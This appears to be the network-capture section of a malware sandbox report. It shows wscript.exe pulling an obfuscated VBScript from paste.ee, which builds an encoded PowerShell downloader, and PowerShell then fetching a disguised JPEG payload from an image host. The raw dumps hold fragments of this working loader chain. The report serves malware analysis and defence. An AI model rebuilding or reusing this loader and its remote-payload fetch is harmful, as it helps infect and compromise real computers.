Apr 24, 2024 10:24:19.223268032 CEST	1289	IN	Data Raw: 4d 69 4c 44 75 79 45 6d 4d 56 4a 54 53 79 55 6a 4d 70 45 7a 78 78 38 62 4d 68 47 54 6d 78 45 5a 4d 4a 47 54 50 77 34 4e 4d 57 43 6a 65 77 77 44 4d 79 41 44 45 41 41 41 41 34 43 41 42 51 44 41 41 41 38 44 2f 2f 38 39 50 77 2b 54 6d 2f 6f 32 50 56 Data Ascii: MiLDuyEmMVJTSyUjMpEzxx8bMhGTmxEZMJGTPw4NMWCjewwDMyADEAAAA4CABQDAAA8D//89Pw+Tm/o2PV9TB+EePY3Dt9oAPAzzo8AHPYtzz7c7OruTd7I2OksTF6YtOxpzF6wQO/nD354bOBgDu4cGOKhjN3UqNRVjw1MaNEWTWz8uMCLDmy4YMOHDpxQYMRBD+wwGMkBAAAAHAEAMAAAgPz6zq+sQPp3jz9QcPH2TL9cBP5x
Apr 24, 2024 10:24:19.223356009 CEST	1289	IN	Data Raw: 4f 32 44 5a 39 6f 54 50 4e 77 7a 2b 38 63 34 4f 4c 76 7a 63 37 6b 30 4f 6a 6f 54 2f 36 67 37 4e 73 65 6a 6d 33 51 5a 4d 6b 48 6a 33 78 73 57 4d 6c 46 7a 42 77 67 4e 4d 4f 44 44 78 41 41 41 41 38 41 41 42 67 42 41 41 41 34 7a 58 39 38 46 50 59 79 Data Ascii: O2DZ9oTPNwz+8c4OLvzc7k0OjoT/6g7Nsejm3QZMkHj3xsWMlFzBwgNMODDxAAAA8AABgBAAA4zX98FPYyjf8sGPRxjP8QyO2sDM64ZOZiT44oNO/iTu4ILOkiTm4IJOlhDT3oqNjUDo1MYN7Vjc1YENETzc0sGNYMD4xUIAAAAUAQAUA8zt/c6Pi9zI+AaPh3zx9oVPP1TP9czOWkDe48MOMeDb2AuN/aDd2gmNUZjT2QkN5UT
Apr 24, 2024 10:24:19.223406076 CEST	1289	IN	Data Raw: 73 6a 4c 41 41 41 41 6b 41 77 41 77 43 41 41 41 6b 6a 4d 35 67 43 4f 65 6a 44 31 34 45 4b 4f 55 65 6a 35 33 34 39 4e 56 66 44 6d 33 38 34 4e 31 5a 54 2f 32 45 76 4e 4d 57 44 36 30 45 4e 4e 46 54 44 6c 30 34 49 4e 48 53 54 65 30 6b 46 4e 39 51 54 Data Ascii: sjLAAAAkAwAwCAAAkjM5gCOejD14EKOUej5349NVfDm384N1ZT/2EvNMWD60ENNFTDl04INHSTe0kFN9QTM0ACNFMz9z0+MjPzxzM7MLODczo2McNzOzsyMmMDFwcLAAAAXAMAoAAAA/M5PE5Tt+wFP5yzY4wiNwZDa2ImNKVTqz09MMLTyy4lMZJTQxcfMXHzhxYDM1DjywEHMfBzVAAAAABwAQCAAA8z3/gyPc8jC+UuPb7zy
Apr 24, 2024 10:24:19.223472118 CEST	1289	IN	Data Raw: 54 70 77 38 4a 4d 61 43 54 6b 77 55 49 4d 39 42 54 64 77 30 47 4d 6d 42 7a 58 77 67 46 4d 52 42 6a 53 77 4d 45 4d 38 41 6a 4e 77 41 44 4d 71 41 44 4a 77 34 42 41 41 45 41 69 41 4d 41 55 41 38 6a 2f 2f 63 2f 50 73 2f 7a 34 2f 30 38 50 6f 2b 7a 6f Data Ascii: Tpw8JMaCTkwUIM9BTdw0GMmBzXwgFMRBjSwMEM8AjNwADMqADJw4BAAEAiAMAUA8j//c/Ps/z4/08Po+zo/03P49Dc/o2Ph9zO/QxPO4T/+UvPG7Tu+ArPh6Tl+onPu4TE9ofPr3j49cdPK3Tw9sYPE2Td94SPm0TH8sIPAyTZ8cFPExzE8MwO9vT57A9OKvjs745OWujT7g0OwsjC6kvOvrD06USO0ljB4kPO0jz044MOJjDu4
Apr 24, 2024 10:24:19.414813042 CEST	1289	IN	Data Raw: 31 41 41 41 41 51 41 67 41 51 42 51 4f 4e 6c 7a 44 34 6f 4d 4f 4a 61 44 4a 32 49 51 4e 58 58 44 6f 31 30 57 4e 36 51 44 6a 7a 51 4c 41 41 41 41 49 41 49 41 51 41 30 54 6a 39 6f 56 50 39 77 44 2f 38 41 4f 50 57 7a 54 7a 38 63 4d 50 42 7a 54 74 38 Data Ascii: 1AAAAQAgAQBQONlzD4oMOJaDJ2IQNXXDo10WN6QDjzQLAAAAIAIAQA0Tj9oVP9wD/8AOPWzTz8cMPBzTt8QKPbyDZ8AFPnwjH8gBPSwzA7Y/OpvT37A9Oouzn7o4O4tTa7k0O8sjC6YeNoWjf1cWNgBAAAAFACABA8U2O0DAAAwAACAAAAAwNjdTX3c1NJdzQ30zN1AAAAgBABAOA345NXajg2knNyZTb2cmNfZzV2okNEZjP2g

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	104.21.84.67	443	1096	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:24:06 UTC	302	OUT	GET /d/4yAaN HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: paste.ee Connection: Keep-Alive
2024-04-24 08:24:07 UTC	1240	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:24:07 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3Sj8EGunp1v9VUj8GfL9IjP%2B8UrpeGGwOzyrhdwC3Ca7jQbjxa06D8RSfqybtimw2KTOjzGV6j%2FPywWurVzPWmjqn69D0jNIl5pOS%2BhozI%2B%2BaEQlRwV%2FzNzQQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794b1f2e99f2f1c-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:24:07 UTC	129	IN	Data Raw: 33 34 63 63 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 67 61 78 65 74 61 20 2c 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 2c 20 69 72 61 63 61 72 75 72 61 20 2c 20 6f 78 79 6d 65 74 72 69 61 20 2c 20 65 6e 74 72 75 64 6f 20 2c 20 43 61 6d 61 20 2c 20 65 6e 74 72 75 64 6f 31 0d 0a 20 20 20 20 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 69 72 Data Ascii: 34cc dim gaxeta , espairecimento , iracarura , oxymetria , entrudo , Cama , entrudo1 espairecimento = " " ir
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 61 63 61 72 75 72 61 20 20 3d 20 22 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 Data Ascii: acarura = "" & oxymetria & espairecimento & oxymetria & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTre
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 38 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6f 78 Data Ascii: reGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & ox
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 49 44 67 54 72 65 42 39 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 Data Ascii: reYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & oxymetria & espairecimento & oxymetria &
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 77 42 70 44 67 54 72 65 47 34 44 67 54 72 65 59 51 42 73 44 67 54 72 65 43 38 44 67 54 72 65 62 67 42 6c 44 67 54 72 65 48 63 44 67 54 72 65 58 77 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 4d 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 34 44 67 54 72 65 44 49 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 6b 44 Data Ascii: airecimento & oxymetria & "wBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTre" & oxymetria & espairecimento & oxymetria & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkD
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 65 62 67 42 6e 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 70 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 51 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 Data Ascii: ebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTre" & oxymetria & espairecimento & oxymetria & "QBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBD
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 65 54 77 42 6d 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 47 6b 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 67 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 Data Ascii: eTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTre" & oxymetria & espairecimento & oxymetria & "DgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTre" & oxymetria & espairecimento & oxymetria & "gDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 51 42 34 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 49 44 67 54 72 65 59 51 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 4e 67 44 67 54 72 65 30 44 67 54 72 65 Data Ascii: oxymetria & espairecimento & oxymetria & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & oxymetria & espairecimento & oxymetria & "QB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTre
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 51 42 6b 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 65 73 70 61 69 72 65 63 69 6d 65 6e 74 6f 20 26 20 6f 78 79 6d 65 74 72 69 61 20 26 20 22 51 42 74 44 67 54 72 65 43 34 44 67 54 72 65 55 67 42 6c 44 67 54 72 65 47 59 44 67 54 72 65 62 44 67 54 72 Data Ascii: eGwDgTrebwBhDgTreGQDgTre" & oxymetria & espairecimento & oxymetria & "QBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTre" & oxymetria & espairecimento & oxymetria & "QBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTr
2024-04-24 08:24:07 UTC	1369	IN	Data Raw: 46 49 44 67 54 72 65 4c 77 44 67 54 72 65 33 44 67 54 72 65 44 63 44 67 54 72 65 4e 67 44 67 54 72 65 32 44 67 54 72 65 44 49 44 67 54 72 65 4c 77 44 67 54 72 65 32 44 67 54 72 65 44 49 44 67 54 72 65 4c 67 44 67 54 72 65 30 44 67 54 72 65 44 45 44 67 54 72 65 4d 67 44 67 54 72 65 75 44 67 54 72 65 44 44 67 54 72 65 44 67 54 72 65 4d 51 44 67 54 72 65 79 44 67 54 72 65 43 34 44 67 54 72 65 4d 67 44 67 54 72 65 35 44 67 54 72 65 44 45 44 67 54 72 65 4c 77 44 67 54 72 65 76 44 67 54 72 65 44 6f 44 67 54 72 65 63 44 67 54 72 65 42 30 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 63 44 67 54 72 65 4d 51 44 67 54 72 65 6e 44 67 54 72 Data Ascii: FIDgTreLwDgTre3DgTreDcDgTreNgDgTre2DgTreDIDgTreLwDgTre2DgTreDIDgTreLgDgTre0DgTreDEDgTreMgDgTreuDgTreDDgTreDgTreMQDgTreyDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49163	172.67.215.45	443	2824	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 08:24:10 UTC	124	OUT	GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-04-24 08:24:10 UTC	697	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 08:24:10 GMT Content-Type: image/jpeg Content-Length: 4198361 Connection: close Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT ETag: "6627c3ad-400fd9" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 1726 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7KSfw1gex8bQF3iHlNqBoW%2BnYkxBE5tpdhCvl3C94CWURSsUFl5vE2KfUNN5Xavodf2pG70F%2FxJi%2FVMpAmsutIHpcHRsUpKoEh%2Fbe1uyvcfICbmM8zrHGHCXZhbsJSdU00BncBa5lpYz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8794b20ae8177cc2-LAX alt-svc: h3=":443"; ma=86400
2024-04-24 08:24:10 UTC	672	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 Data Ascii: H%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 Data Ascii: mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-24 08:24:10 UTC	1369	IN	Data Raw: f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c Data Ascii: 2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
